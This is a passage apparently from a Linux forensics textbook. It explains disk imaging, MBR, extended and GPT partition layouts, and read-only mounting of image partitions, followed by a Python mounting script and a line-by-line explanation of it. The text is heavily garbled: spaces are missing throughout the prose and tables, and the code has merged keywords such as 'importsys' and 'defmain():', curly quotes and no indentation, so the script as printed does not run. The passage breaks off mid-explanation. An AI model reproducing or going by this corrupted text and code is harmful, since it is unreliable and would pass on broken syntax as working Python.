CREATINGANIMAGEFROMAVIRTUALMACHINEWhileyouarenotlikelytoneedtocreateanimagefromavirtualmachineprofessionally,youmightwish to do so if you are practicing and/or following alongwith someof theexamplesfromthisbook.Ifallyouneedisarawimage,youcanusethetoolsthatcomewithVirtualBoxinordertocreatearawimage.
One downside of using theVirtualBox tools is that youwon’t get the hashes dcflddprovides.Anotherdownsideisthatyouwon’tgettopracticeusingthetoolsyouneedforimaging a physical drive. The command to create the image from a Linux host isvboxmanage clonehd <virtual disk image file> <output rawimagefile>—formatRAW.
IfyouarehostingyourvirtualmachineonLinux,youcanstilluse thestandard toolssuchasdcfldd.ThereasonthatthisworksisthatLinuxissmartenoughtotreatthisvirtualimage file like a real device. This can be verified by running the command fdisk<virtual disk image file>. The results of running this command against avirtualmachineharddriveareshowninFigure4.3.
FIGURE4.3
Resultsofrunningfdiskagainstavirtualmachineimage.
CREATINGANIMAGEFROMAPHYSICALDRIVECreatingan imagefromphysicalmedia isaprettysimpleprocess if themediahasbeenremoved.Youcanuseacommercialwriteblockerifyouhaveone.Personally,Iprefertousetheudevrules-basedsystemdescribedearlierinthischapter.Regardlessofwhatyouuseforwriteblocking,IstronglyrecommendyouuseUSB3.0devices.
MypersonalsetupconsistsofaSabrentUSB3.0hubmodelHB-UM43whichprovideswriteblockingviamyudevrulessystemandaSabrentUSB3.0SATAdrivedockmodelDS-UBLK.ThiscombinationcanbepurchasedfrommultiplevendorsforunderUS$40.MysetupisshowninFigure4.4.
FIGURE4.4
Anaffordablediskimagingsystem.
SUMMARYInthischapterwediscussedhowtocreatediskimages.Thisincludedimagingtoolssuchas dcfldd, software and hardwarewrite-blockers, techniques, and inexpensive hardwareoptions.Inthenextchapterwewilldelveintothetopicofactuallymountingtheseimagessowecanbeginourdead(filesystem)analysis.
CHAPTER
5MountingImagesINFORMATIONINTHISCHAPTER:
MasterBootRecord-basedPartitionsExtendedPartitionsGUIDPartitionTablePartitionsMountingPartitionsUsingPythontoAutomatetheMountingProcess
PARTITIONBASICSIt was common for early personal computers to have a single filesystem on their harddrives.Ofcourse itwasalsocommonfor theircapacities tobemeasured insingledigitmegabytes. Once drives started becoming larger, people began organizing them intopartitions.
Initially up to four partitions were available. When this was no longer enough, anineloquentsolution,knownasextendedpartitions,wasdevelopedinordertoallowmorethanfourpartitions tobecreatedonadrive.Peopleputupwith thiskludgefordecadesbeforeabettersolutionwasdeveloped.Allofthesepartitioningsystemswillbediscussedindetailinthischapterstartingwiththeoldest.
Hard drives are described by the number of read/write heads, cylinders, and sectors.Eachplatterhascirclesofdatawhicharecalledtracks.Whenyoustackmultiplecirclesontopofeachothertheystarttolooklikeacylinderandthatisexactlywhatwecalltracksthat areon topof eachother physically.Evenwhen there is onlyoneplatter, there is atrackoneachsideof theplatter.Thetracksaredividedintochunkscalledsectors.HarddiskgeometryisshowninFigure5.1.
FIGURE5.1
Harddiskgeometry.
You will see entries for cylinders, heads, and sectors in some of the data structuresdiscussed in this chapter. Most modern media use logical block addressing, but theseremnantsofanearliertimearestillfound.Whetherornotthesevaluesareusedisanotherstory.
MASTERBOOTRECORDPARTITIONSThe firstmethod of havingmultiple partitionswas to create something called aMasterBootRecord(MBR)onthefirstsectoroftheharddisk.Thiswasdevelopedwaybackinthe 1980s.Amaximum of four partitions are permitted in theMaster BootRecord.Atmost one of these four partitions can bemarked as bootable. The overall format for aMBRisshowninTable5.1.
Table5.1.MasterBootRecordFormat
Offset Length Item
0(0x00) 446(0x1BE) Bootcode
446(0x1BE) 16(0x10) Firstpartition
462(0x1CE) 16(0x10) Secondpartition
478(0x1DE) 16(0x10) Thirdpartition
494(0x1EE) 16(0x10) Fourthpartition
510(0x1FE) 2(0x2) Signature0x550xAA
EachofthepartitionentriesintheMBRcontainstheinformationshowninTable5.2.
Table5.2.PartitionEntryFormat
Offset Length Item
0(0x00 1(0x01) Activeflag(0x80=bootable)
1(0x01) 1(0x01) Starthead
2(0x02) 1(0x01) Startsector(bits0-5);upperbitsofcylinder(6-7)
3(0x03) 1(0x01) Startcylinderlowest8bits
4(0x04) 1(0x01) Partitiontypecode(0x83=Linux)
5(0x05) 1(0x01) Endhead
6(0x06) 1(0x01) Endsector(bits0-5);upperbitsofcylinder(6-7)
7(0x07) 1(0x01) Endcylinderlowest8bits
8(0x08) 4(0x04) Sectorsprecedingpartition(littleendian)
12(0x0C) 4(0x04) Sectorsinpartition
Let’sdiscussthesefieldsinthepartitionentriesoneatatime.Thefirstentryisanactiveflagwhere0x80meansactiveandanythingelse(usually0x00)isinterpretedasinactive.IntheMasterBootRecordactivemeansitisbootable.Forobviousreasonstherecanbeatmostonebootablepartition.Thatdoesn’tmean thatyoucannotbootmultipleoperatingsystems,justthatyoumustboottosomesortofselectionmenuprogramtodoso.
The next entry is the starting head for the partition. This is followed by the startingsectorandcylinder.Becausethenumberofcylindersmightexceed255anditisunlikelythatsomanysectorswouldbeinasingletrack,theuppertwobitsfromthebytestoringthesectoraretheuppertwobitsforthecylinder.Thissystemallowsupto64sectorspertrackand1024cylinders.Notethatwithonlythreebytesofstoragepartitionsmustbeginwithinthefirsteightgigabytesofthediskassumingstandard512bytesectors.
Theentryfollowingthestartingaddressisapartitiontypecode.ForWindowssystemsthistypecodeisusedtodeterminethefilesystemtype.Linuxsystemsnormallyuse0x83as the partition type and any supported filesystem may be installed on the partition.Partitiontype0x82isusedforLinuxswappartitions.
Thecylinder/head/sectoraddressof theendof thepartition follows thepartition type.Thesameformat isusedas that for thestartingaddressof thepartition.Thenumberofsectors preceding the partition and total sectors occupy the last two positions in thepartition entry. Note that these are both 32-bit values which allows devices up to twoterabytes (2048 gigabytes) to be supported. Most modern devices use Logical BlockAddressing(LBA)andthecylinder/head/sectoraddressesareessentiallyignored.
EXTENDEDPARTITIONSWhen four partitionswere no longer enough, a new systemwas invented. This systemconsistsofcreatingoneormoreextendedpartitionsinthefouravailableslotsintheMBR.Themostcommonextendedpartitiontypesare0x05and0x85,withtheformerusedbyWindowsandLinuxandthelaterusedonlybyLinux.EachextendedpartitionbecomesalogicaldrivewithanMBRof itsown.Normallyonly thefirst twoslots in theextendedpartitionMBRareused.
The addresses in partition entries in the extended partition’sMBR are relative to thestartoftheextendedpartition(itisitsownlogicaldriveafterall).Logicalpartitionsintheextendedpartitioncanalsobeextendedpartitions.Inotherwords,extendedpartitionscanbe nested which allowsmore than eight partitions to be created. In the case of nestedextendedpartitions,thelastpartitionisindicatedbyanemptyentryinthesecondslotinthatextendedpartition’sMBR.NestedextendedpartitionsareshowninFigure5.2.
FIGURE5.2
NestedExtendedPartitions.
GUIDPARTITIONSThemethodofcreatingpartitionsisnot theonlythingshowingitsage.TheBasicInputOutputSystem(BIOS)bootprocessisalsoquiteoutdated.UndertheBIOSbootprocessanultramodern64-bitcomputerisnotstartedin64-bitmode.Itisn’tevenstartedin32-bitmode.TheCPUisforcedtoregressallthewaybackto16-bitcompatibilitymode.Infact,ifyouexaminethebootcodeintheMBRyouwilldiscoverthatitis16-bitmachinecode.
The BIOS boot process has been replaced with the Unified Extensible FirmwareInterface(UEFI)bootprocess.UEFI(pronouncedooh-fee)bootingallowsacomputertostartin64-bitmodedirectly.All64-bitcomputersshippedtodayuseUEFIandnotBIOSforbooting, although they support legacybooting fromMBR-baseddrives.This legacysupportisprimarilyintendedtoallowbootingfromremovablemediasuchasDVDsandUSBdrives.
Anewmethodof specifyingpartitionswas also created to go alongwithUEFI.ThisnewmethodassignsaGloballyUnique Identifier (GUID) toeachpartition.TheGUIDsare stored in aGUID Partition Table (GPT). TheGPT has space for 128 partitions. Inaddition to the primary GPT, there is a secondary GPT stored at the end of the disk(highest numbered logical block) to mitigate the chances of bad sectors in the GPTrenderingadiskunreadable.
AdriveusingGUIDpartitioningbeginswithaprotectiveMBR.ThisMBRhasasingle
entry covering the entire diskwith a partition type of 0xEE.Legacy systems that don’tknowhowtoprocessaGPTalsodon’tknowwhattodowithapartitionoftype0xEEsothey will ignore the entire drive. This is preferable to having the drive accidentallyformattedifitappearsemptyorunformatted.
As has been mentioned previously, modern systems use Logical Block Addressing(LBA).TheprotectiveMBRisstoredinLBA0.TheprimaryGPTbeginswithaheaderinLBA1,followedbyGPTentriesinLBA2throughLBA34.EachGPTentryrequires128bytes.Asaresult, therearefourentriesperstandard512byteblock.WhileGPTentriesare128bytestoday, thespecificationallowsfor largerentries(withsizespecifiedintheGPTheader)tobeusedinthefuture.Blocksareprobably512byteslong,butthisshouldnotbeassumed.ThesecondaryGPTheaderisstoredinthelastLBAandthesecondaryGPT entries are stored in the preceding 32 sectors.The layout of aGPT-based drive isshowninFigure5.3.
FIGURE5.3
LayoutofadrivewithGUIDpartitioning.
TheGPTheader format is shown inTable 5.3.When attempting tomount imagesofdrivesusingGUIDpartitioning,thisheadershouldbecheckedinordertofutureproofanyscriptsshouldthedefaultvaluesshowninthetablechange.
Table5.3.GUIDPartitionTableHeaderFormat.
Offset Length Contents
0(0x00) 8bytes Signature(“EFIPART”or0x5452415020494645)
8(0x08) 4bytes RevisioninBinaryCodedDecimalformat(version1.0=0x000x000x010x00)
12(0x0C) 4bytes Headersizeinbytes(92bytesatpresent)
16(0x10) 4bytes HeaderCRC32checksum
20(0x14) 4bytes Reserved;mustbezero
24(0x18) 8bytes CurrentLBA(wherethisheaderislocated)
32(0x20) 8bytes BackupLBA(wheretheotherheaderislocated)
40(0x28) 8bytes FirstusableLBAforpartitions
48(0x30) 8bytes LastusableLBAforpartitions
56(0x38) 16bytes DiskGUID
72(0x48) 8bytes StartingLBAofarrayofpartitionentries
80(0x50) 4bytes Numberofpartitionentriesinarray
84(0x54) 4bytes Sizeofasinglepartitionentry(usually128)
88(0x58) 4bytes CRC32checksumofthepartitionarray
92(0x5C) — Reserved;mustbezeroesfortherestoftheblock
TheformatforeachpartitionentryisshowninTable5.4.TheformatfortheattributesfieldintheseentriesisshowninTable5.5.UnlikeMBR-basedpartitionswithonebytetoindicate partition type, GPT-based partitions have a 16-byte GUID for specifying thepartition type. This type GUID is followed by a partition GUID (essentially a serialnumber)whichisalsosixteenbyteslong.YoumightseeLinuxdocumentationrefertothispartitionGUIDasaUniversallyUniqueIdentifier(UUID).
Table5.4.GUIDPartitionTableEntryFormat.
Offset Length Item
0(0x00 16(0x10) PartitiontypeGUID
16(0x10) 16(0x10) UniquepartitionGUID
32(0x20) 8(0x08) FirstLBA
40(0x28) 8(0x08) LastLBA
48(0x30) 8(0x08) Attributes
56(0x38) 72(0x48) Partitionname(UTF-16encoding)
Table5.5.GUIDPartitionTableEntryAttributesFormat.
Bit Content Description
0 Systempartition Mustpreservepartitionasis
1 EFIFirmware Operatingsystemshouldignorethispartition
2 LegacyBIOSboot Equivalentto0x80inMBR
3-47 Reserved Shouldbezeros
48-63 Typespecific Variesbypartitiontype(60=RO,62=Hidden,63=NoautomountforWindows)
The start and end LBA follow the UUID. Next comes the attributes and then thepartitionnamewhichcanbeupto36Unicodecharacterslong.Attributefieldsare64bitslong. As can be seen in Table 5.5, the lowest three bits are used to indicate a systempartition,firmwarepartition,andsupportforlegacyboot.Systempartitionsarenottobechangedandfirmwarepartitionsaretobecompletelyignoredbyoperatingsystems.Themeaningoftheuppersixteenbitsoftheattributefielddependsonthepartitiontype.
MOUNTINGPARTITIONSFROMANIMAGEFILEONLINUXLinux is the best choice for a forensics platform for several reasons, regardless ofoperatingsystemusedbythesubjectsystem.Oneofthemanyreasonsthatthisistrueisthe easewithwhich an image file can bemounted.Once filesystems in an image havebeenmountedallofthestandardsystemtoolscanbeusedaspartoftheinvestigation.
Linuxtools,suchasfdisk,canalsobeuseddirectlyonanimagefile.Thisfactmightnotbeimmediatelyobvious,butwewillshowittobetrue.ThekeytobeingabletouseournormaltoolsisLinux’ssupportforloopdevices.Inanutshell,aloopdeviceallowsa
filetobetreatedasablockdevicebyLinux.
Thecommand for runningfdiskonan image is simplyfdisk<imagefile>.Afterfdisk hasbeen run, thepartition table is easilyprintedby typingp<enter>.Thekeypieceofinformationyouneedforeachpartitiontomountitisthestartingsector(LBA). The results of running fdisk and printing the partition table for a WindowsvirtualmachineimageareshowninFigure5.4.NotethatinmostcaseswedonotneedtoknowthepartitiontypeastheLinuxmountcommandissmartenoughtofigurethisoutonitsown.
ThesingleprimarypartitionintheimagefromFigure5.4beginsatsector63.Inordertomountthisimageweneedtofirstcreateamountpointdirectorybytypingsudomkdir<mountpoint>, i.e.sudomkdir/media/win-c.Nextwe need tomount thefilesystemusing themount command.The general syntax for the command ismount[options]<sourcedevice><mountpointdirectory>.
FIGURE5.4
Running fdisk on an image file. Note that root privileges are not required to run fdisk on an image. Thestartingsectorwillbeneededlaterformounting.
Theoptionsrequiredtomountanimageinaforensicallysoundwayarero(read-only)andnoatime(noaccesstimeupdating).Thesecondoptionmightseemunnecessary,butitinsuresthatcertaininternaltimestampsarenotupdatedaccidentally.Mountinganimagefilerequirestheloopandoffsetoptions.
Putting all of these together, the full mount command is sudo mount -oro,noatime,loop,offset=<offset to start of partition inbytes> <image file> <mount point directory>. The offset can becalculated using a calculator or a little bash shell trick. Just like commands can be
executedbyenclosing them in$(),youcandomathon thecommand linebyenclosingmathematicaloperationsin$(()).
Using our bash shell trick, the proper command is sudo mount -oro,noatime,loop,offset=$((<startingsector>*512))<imagefile><mountpointdirectory>.TheseriesofcommandstomounttheimagefromFigure5.4areshowninFigure5.5.
FIGURE5.5
Mountingasingleprimarypartitionfromanimagefile.
Whatifyourimagecontainsextendedpartitions?Theprocedureisexactlythesame.AnimagewithanextendedpartitionisshowninFigure5.6.Notethatfdisktranslatestherelativesectoraddressesinsidetheextendedpartitiontoabsoluteaddressesintheoverallimage.Alsonote that theswappartition inside theextendedprimarypartitionstarts twosectors into thepartition.The first sector isusedby the extendedpartition’smini-MBRand the second is just padding to make the swap partition start on an even-numberedsector.
Themini-MBRfrom theextendedpartition in the image fromFigure5.6 is shown inFigure5.7.Thepartitiontype,0x82,ishighlightedinthefigure.RecallthatthisisthetypecodeforaLinuxswappartition.NoticethatthesecondMBRentryisblankindicatingthatthere are no extended partitions nested inside this one. Thedd command was used togeneratethisfigure.
FIGURE5.6
Animagefilewithanextendedpartition.
FIGURE5.7
Amini-MBRfromanextendedpartition.Thehighlightedbyteisforthepartition,0x82,whichindicatesthisisaswappartition.Notethatthesecondentryisblankindicatingtherearenonestedextendedpartitionsunderthisone.
Aquickwaytoviewasinglesectorfromanimageistoissuethecommandddskip=
<sector number> bs=<sector size> count=1 if=<image file> |xxd.The commandused togenerateFigure5.7wasddskip=33556478bs=512count=1 if=pentester-academy-subject1-flat.vmdk | xxd. It isimportanttorealizethatddusesblocks(withadefaultblocksizeof512)whereasmountusesbytes.Thisiswhywedon’thavetodoanymathtousedd.
The commands required and also the results ofmounting the primary partition fromFigure5.6areshowninFigure5.8.NoticethatmyUbuntusystemautomaticallypoppedupthefilebrowserwindowshown.Thisisanexampleofbehaviorthatcanbecustomizedusingudevrulesasdescribedearlierinthisbook.
FIGURE5.8
MountingaLinuxpartitioninanimagefromthecommandline.
What if your subject system is using GUID Partition Tables (GPT)? The results ofrunning fdisk against such a system are shown in Figure 5.9. The only partitiondisplayedcoverstheentirediskandhastype0xEE.ThisistheprotectiveMBRdiscussedearlierinthischapter.NotethatfdiskdisplaysawarningthatincludesthecorrectutilitytorunforGPTdrives.
FIGURE5.9
RunningfdiskonadrivethatusesGUIDPartitionTables.
TheresultsofrunningpartedontheGPTdrivefromFigure5.9areshowninFigure5.10.Inthefigureweseeasystempartitionwhichismarkedasbootable,severalNTFSpartitions,anext4andLinuxswappartitions.ThisisacomputerthatcamepreloadedwithWindows8.1withsecureboot(whichreallymeansmakeitdifficulttobootanythingotherthanWindows)whichhashadLinuxinstalledafterthefact.
FIGURE5.10
ResultofrunningpartedontheGPTdrivefromFigure5.9.
YoumayhavenoticedthattheresultsdisplayedinFigure5.10specifythestartandstopofpartitionsinkilobytes,megabytes,andgigabytes.Inordertomountapartitionweneedto know the exact start of each partition. The unit command inparted allows us tospecifyhowthesevaluesaredisplayed.TwopopularchoicesaresandBwhichstandforsectorsandbytes,respectively.TheresultsofexecutingthepartedprintcommandusingbothsectorsandbytesareshowninFigure5.11.
FIGURE5.11
Changingthedefaultunitsinpartedtoshowpartitionboundariesinsectorsandbytes.
Oncethestartingoffsetisknown,mountingapartitionfromaGPTimageisexactlythesameas theprecedingtwocases(primaryorextendedpartitionsonMBR-baseddrives).ThepartedutilitycanbeusedonMBR-baseddrivesaswell,but thedefaultoutput isnot as easy to use. Next we will discuss using Python to make this mounting processsimpleregardlessofwhatsortofpartitionsweareattemptingtomount.
USINGPYTHONTOAUTOMATETHEMOUNTINGPROCESSAutomation is a good thing. It saves time and also prevents mistakes caused by fat-fingeringvalues.Uptothispointinthebookwehaveusedshellscriptingforautomation.Inorder tomountourpartitionswewillutilizethePythonscriptinglanguage.Asthis isnot a book on Python, I will primarily only be describing how my scripts work. Forreaders that want amore in-depth coverage of Python I highly recommend the PythoncourseatPentesterAcademy.com(http://www.pentesteracademy.com/course?id=1).
WHATISITGOODFOR?ScriptingorProgrammingLanguageYouwillseemerefer toPythonasascriptinglanguagein thisbook.Somemightsaythatitisaprogramminglanguage.Whichiscorrect?Theyarebothcorrect.Inmymindascriptinglanguageisaninterpretedlanguagethatallowsyoutoquicklydowork.Pythoncertainlymeetsthiscriteria.
To me, a programming language is something that is used to create largeprogramsandsoftwaresystems.TherearesomethatcertainlyhavedonethiswithPython. However, I would argue that Python is not the best choice whenperformanceisanissueandthesameprogramwillberunmanytimeswithoutanycode modifications. I’m sure that anyone who has ever run a recent version ofMetasploitwouldagreethatrunninglargeprogramswrittenininterpretedlanguagescanbepainful.
Youmightaskwhyweare switching toPython.This isavalidquestion.ThereareacoupleofreasonstousePythonforthistask.First,wearenolongerjustrunningprogramsandpushingbytesaround.Rather,wearereading infiles, interpreting them,performingcalculations,andthenrunningprograms.Second,wearelookingtobuildalibraryofcodeto use in our investigations.Having Python code that interpretsMBR andGPT data islikelytobeusefulfurtherdowntheroad.
MBR-basedprimarypartitionsWewill startwith the simplest case, primarypartitions fromMBR-baseddrives. I havebroken up the mounting code into three separate scripts for simplicity. Feel free tocombinethemif that iswhatyouprefer. It isopensourceafterall.ThefollowingscriptwillmountprimarypartitionsfromanMBR-basedimagefile.#!/usr/bin/python
#
#mount-image.py
#ThisisasimplePythonscriptthatwill
#attempttomountpartitionsfromanimagefile.
#Imagesaremountedread-only.
#
#DevelopedbyDr.PhilPolstra(@ppolstra)
#forPentesterAcademy.com
importsys
importos.path
importsubprocess
importstruct
“””
ClassMbrRecord:decodesapartitionrecordfromaMasterBootRecord
Usage:rec=MbrRecord(sector,partno)where
sectoristhe512byteorgreatersectorcontainingtheMBR
partnoisthepartitionnumber0-3ofinterest
rec.printPart()printspartitioninformation
“””
classMbrRecord():
def__init__(self,sector,partno):
self.partno=partno
#firstrecordatoffset446&recordsare16bytes
offset=446+partno*16
self.active=False
#firstbyte==0x80meansactive(bootable)
ifsector[offset]==‘\x80’:
self.active=True
self.type=ord(sector[offset+4])
self.empty=False
#partitiontype==0meansitisempty
ifself.type==0:
self.empty=True
#sectorvaluesare32-bitandstoredinlittleendianformat
self.start=struct.unpack(‘<I’,sector[offset+8:\
offset+12])[0]
self.sectors=struct.unpack(‘<I’,sector[offset+12:\
offset+16])[0]
defprintPart(self):
ifself.empty==True:
print(“<empty>”)
else:
outstr=“”
ifself.active==True:
outstr+=“Bootable:”
outstr+=“Type“+str(self.type)+“:”
outstr+=“Start“+str(self.start)+“:”
outstr+=“Totalsectors“+str(self.sectors)
print(outstr)
defusage():
print(“usage“+sys.argv[0]+
“<imagefile>\nAttemptstomountpartitionsfromanimagefile”)
exit(1)
defmain():
iflen(sys.argv)<2:
usage()
#readfirstsector
ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopenedforreading”)
exit(1)
withopen(sys.argv[1],‘rb’)asf:
sector=str(f.read(512))
if(sector[510]==“\x55”andsector[511]==“\xaa”):
print(“LookslikeaMBRorVBR”)
#ifitisanMBRbytes446,462,478,and494mustbe0x80or0x00
if(sector[446]==‘\x80’orsector[446]==‘\x00’)and\
(sector[462]==‘\x80’orsector[462]==‘\x00’)and\
(sector[478]==‘\x80’orsector[478]==‘\x00’)and\
(sector[494]==‘\x80’orsector[494]==‘\x00’):
print(“MustbeaMBR”)
parts=[MbrRecord(sector,0),MbrRecord(sector,1),\
MbrRecord(sector,2),MbrRecord(sector,3)]
forpinparts:
p.printPart()
ifnotp.empty:
notsupParts=[0x05,0x0f,0x85,0x91,0x9b,0xc5,0xe4,0xee]
ifp.typeinnotsupParts:
print(“SorryGPTandextendedpartitionsare“+“notsupportedbythisscript!”)
else:
mountpath=‘/media/part%s’%str(p.partno)
#iftheappropriatedirectorydoesn’texistcreateit
ifnotos.path.isdir(mountpath):
subprocess.call([‘mkdir’,mountpath])
mountopts=‘loop,ro,noatime,offset=%s’%\
str(p.start*512)
subprocess.call([‘mount’,‘-o’,\
mountopts,sys.argv[1],mountpath])
else:
print(“AppearstobeaVBR\nAttemptingtomount”)
ifnotos.path.isdir(‘/media/part1’):
subprocess.call([‘mkdir’,‘/media/part1’])
subprocess.call([‘mount’,‘-o’,‘loop,ro,noatime’,\
sys.argv[1],‘/media/part1’])
if__name__==“__main__”:
main()
Let’sbreakdowntheprecedingscript.Itbeginswiththeusualshe-bang;however,thistimewe are running the Python interpreter instead of the bash shell. Just aswith shellscripts,allofthelinesbeginningwith“#”arecomments.WethenimportPythonlibrariessys, os.path, subprocess, and struct which are needed to get command line arguments,checkfortheexistenceoffiles,launchotherprocessesorcommands,andinterpretvaluesintheMBR,respectively.
NextwedefineaclassMbrRecordwhichisusedtodecodethefourpartitionentriesintheMBR.TheclassdefinitionisprecededwithaPythonmulti-linecommentknownasadocstring. Three double quotes on a line start or stop the docstring. Likemany object-oriented languages, Python uses classes to implement objects. Python is different fromotherlanguagesinthatitusesindentationtogrouplinesofcodetogetheranddoesn’tusealineterminationcharactersuchasthesemicolonusedbynumerouslanguages.
ThelineclassMbrRecord():tellsthePythoninterpreterthataclassdefinitionfortheMbrRecordclassfollowsonindentedlines.Theemptyparenthesesindicatethatthereis no base class. In otherwords, theMbrRecord is not amore specific (or specialized)versionofsomeotherobject.Baseclassescanbeusefulastheyallowyoutomoreeasilyandeloquentlysharecommoncode,buttheyarenotusedextensivelybypeoplewhousePythontowritequickanddirtyscriptstogetthingsdone.
The line def __init__(self, sector, partno): inside the MbrRecordclass definition begins a function definition. Python allows classes to define functions(sometimes called methods) and values (also called variables, parameters, or datamembers)thatareassociatedwiththeclass.Everyclassimplicitlydefinesavaluecalledself that is used to refer to an object of the class type. With a few exceptions (notdescribed in this book) every class functionmust have self as the first (possibly only)argument it accepts. This argument is implicitly passed by Python.We will talk moreaboutthislaterasIexplainthisscript.
Everyclass shoulddefinean__init__ function (that is adoubleunderscoreprecedingandfollowinginit).Thisspecialfunctioniscalledaconstructor.Itisusedwhenanobjectof a certain type is created. The __init__ function in the MbrRecord class is used asfollows:
partition=MbrRecord(sector,partitionNumber)
ThiscreatesanewobjectcalledpartitionoftheMbrRecordtype.IfwewanttoprintitscontentswecancallitsprintPartfunctionlikeso:
partition.printPart()
Back to the constructor definition.We first store the passed in partition number in aclassvalueonthelineself.partno=partno.Thenwecalculatetheoffsetintothe
MBRforthepartitionofinterestwithoffset=446+partno*16,asthefirstrecordisatoffset446andeachrecordis16byteslong.
Nextwechecktoseeifthefirstbyteinthepartitionentryis0x80whichindicatesthepartition is active (bootable). Python, like many other languages, can treat strings asarrays.Also,likemostlanguages,theindexesarezero-based.The==operatorisusedtocheckequalityandthe=operatorisusedforassignment.AsinglebytehexadecimalvalueinPython canbe representedby a packed string containing a “\x”prefix.For example,‘\x80’inourscriptmeans0x80.PuttingallofthistogetherweseethatthefollowinglinessetaclassvaluecalledactivetoFalseandthenresetsthevaluetoTrueifthefirstbyteinapartitionentryis0x80.NotethatPythonusesindentationtodeterminewhatisruniftheifstatementevaluatestoTrue.
self.active=False
#firstbyte==0x80meansactive(bootable)
ifsector[offset]==‘\x80’:
self.active=True
Afterinterpretingtheactiveflag,theMbrRecordconstructorretrievesthepartitiontypeandstoresitasanumericalvalue(notapackedstring)onthelineself.type=ord(sector[offset+4]). The construct ord(<single character>) is used toconvertapackedstringintoanintegervalue.Next thetypeischeckedforequalitywithzero.Ifitiszero,theclassvalueofemptyissettoTrue.
Finally, the starting and total sectors are extracted from the MBR and stored inappropriate class values. There is a lot happening in these two lines. It is easier tounderstanditifyoubreakitdown.Wewillstartwiththestatementsector[offset+8:offset+12]. In Python parlance this is known as an array slice.An array isnothingbutalistofvaluesthatareindexedwithzero-basedintegers.SomyArray[0]isthefirstiteminmyArray,myArray[1]isthesecond,etc.Tospecifyasubarray(slice)inPython the syntax ismyArray[<firstindexofslice>:<lastindexofslice+1>].Forexample,ifmyArraycontains“Thisistheend,myonetruefriend!”thenmyArray[8:15]wouldbeequalto“theend”.
Theslicesintheselasttwolinesoftheconstructorcontain32-bitlittleendianintegersinpacked string format. If you are unfamiliarwith the term little endian, it refers to howmulti-bytevaluesare stored inacomputer.Nearlyall computersyouare likely toworkwith while doing forensics store values in little endian format which means bytes arestored from least tomost significant.For example, thevalue0xAABBCCDDwouldbestoredas0xDD0xCC0xBB0xAAor‘\xDD\xCC\xBB\xAA’inpackedstringformat.Theunpackfunctionfromthestructlibraryisusedtoconvertapackedstringintoanumericalvalue.
Recallthatthestructlibrarywasoneoftheimportedlibrariesatthetopofourscript.InorderforPythontofindthefunctionsfromtheseimportedlibrariesyoumustprefacethefunctionnameswiththelibraryfollowedbyaperiod.Thatiswhytheunpackfunctioniscalledstruct.unpackinourscript.Theunpackfunctiontakesaformatstringandapacked
stringasinput.Ourformatstring‘<I’specifiesanunsignedintegerinlittleendianformat.Theformatstringinputtotheunpackfunctioncancontainmorethanonespecifierwhichallowsunpacktoconvertmorethanonevalueatatime.Asaresult,theunpackfunctionreturnsanarray.Thatiswhyyouwillfind“[0]”ontheendofthesetwolinesasweonlywantthefirstiteminthereturnedarray(whichshouldbetheonlyitem!).Whenyoubreakit down, it is easy to see that self.start = struct.unpack(‘<I’,sector[offset + 8: offset + 12])[0] gets a 4-byte packed stringcontainingthestartingsectorinlittleendianformat,convertsittoanumericvalueusingunpack,andthenstorestheresultinaclassvaluenamedstart.
TheprintPartfunctioninMbrRecordisalittleeasiertounderstandthantheconstructor.First this function checks to see if the partition entry is empty; if so, it just prints“<empty>”.If it isnotempty,whetherornot it isbootable, its type,startingsector,andtotalsectorsaredisplayed.
Thescriptcreatesausagefunctionsimilartowhatwehavedonewithourshellscriptsin the past. Note that this function is not indented and, therefore, not part of theMbrRecordclass.Thefunctiondoesmakeuseofthesyslibrarythatwasimportedinordertoretrievethenameofthisscriptusingsys.argv[0]whichisequivalentto$0inourshellscripts.
We then define a main function. As with our shell scripts, we first check that anappropriatenumberofcommandlineargumentsarepassedin,and,ifnot,displayausagemessage and exit.Note that the test here is for less than twocommand line arguments.Therewill alwaysbeone command line argument, thenameof the scriptbeing run. Inother words, if len(sys.argv) < 2: will only be true if you passed in noarguments.
Oncewehaveverifiedthatyoupassedinatleastoneargument,wechecktoseeifthefilereallyexistsandisreadable,displayinganerrorandexitingifitisn’t,inthefollowinglinesofcode:ifnotos.path.isfile(sys.argv[1]):
print(“File“+sys.argv[1]+“cannotbeopenedforreading”)
exit(1)
ThenexttwolinesmightseemabitstrangeifyouarenotaPythonprogrammer(yet).ThisconstructisthepreferredwayofopeningandreadingfilesinPythonasitissuccinctand insures that your files will be closed cleanly. Even some readers who use Pythonmightnotbefamiliarwiththismethodasithasbeenavailableforlessthanadecade,andIhaveseensomerecentlypublishedPythonbooksinforensicsandinformationsecuritystillteaching people the old, non-preferredway of handling files.The two lines in questionfollow.
withopen(sys.argv[1],‘rb’)asf:
sector=str(f.read(512))
To fully understand why this is a beautiful thing, you need to first understand howPython handles errors. Like many other languages, Python uses exceptions for error
handling.Atahighlevelexceptionsworkasfollows.Anyriskycodethatmightgenerateanerror(whichiscalledthrowinganexception)isenclosedinatryblock.Thistryblockis followed by one ormore exception catching blocks thatwill process different errors(exception types). There is also an optional block, called a finally block, that is calledeverytimetheprogramexitsthetryblockwhetherornottherewasanerror.Thetwolinesaboveareequivalenttothefollowing:
try:
f=open(sys.argv[1],‘rb’)
sector=str(f.read(512))
exceptExceptionase:
print‘Anexceptionoccurred:’,e
finally:
f.close()
The file passed in to the script is opened as a read-only binary file because the ‘rb’argumentpassedtoopenspecifiesthefilemode.Whenthefileisopened,anewfileobjectnamedfiscreated.Thereadfunctionoffisthencalledandthefirst512bytes(containingtheMBR)areread.TheMBRisconvertedtoastringbyenclosingf.read(512)insidestr()and this string is stored in avariablenamed sector.Regardlessof anyerrors, the file isclosedcleanlybeforeexecutionofthescriptproceeds.
Once theMBRhasbeenreadwedoasanitycheck. If thefile isnotcorruptedor thewrongkindoffile,thelasttwobytesshouldbe0x550xAA.ThisisthestandardsignatureforanMBRorsomethingcalledaVolumeBootRecord(VBR).AVBRisabootsectorforaFileAllocationTable(FAT)filesystemusedbyDOSandolderversionsofWindows.TodistinguishbetweenaVBRandMBRwecheckthefirstbyteforeachMBRpartitionentryandverifythateachiseither0x80or0x00.Ifallfourentriescheckout,weproceedundertheassumptionthatitisanMBR.OtherwiseweassumeitisaVBRandmounttheonlypartitionstraightaway.
Thelineparts=[MbrRecord(sector,0),MbrRecord(sector,1),\
MbrRecord(sector,2),MbrRecord(sector,3)]
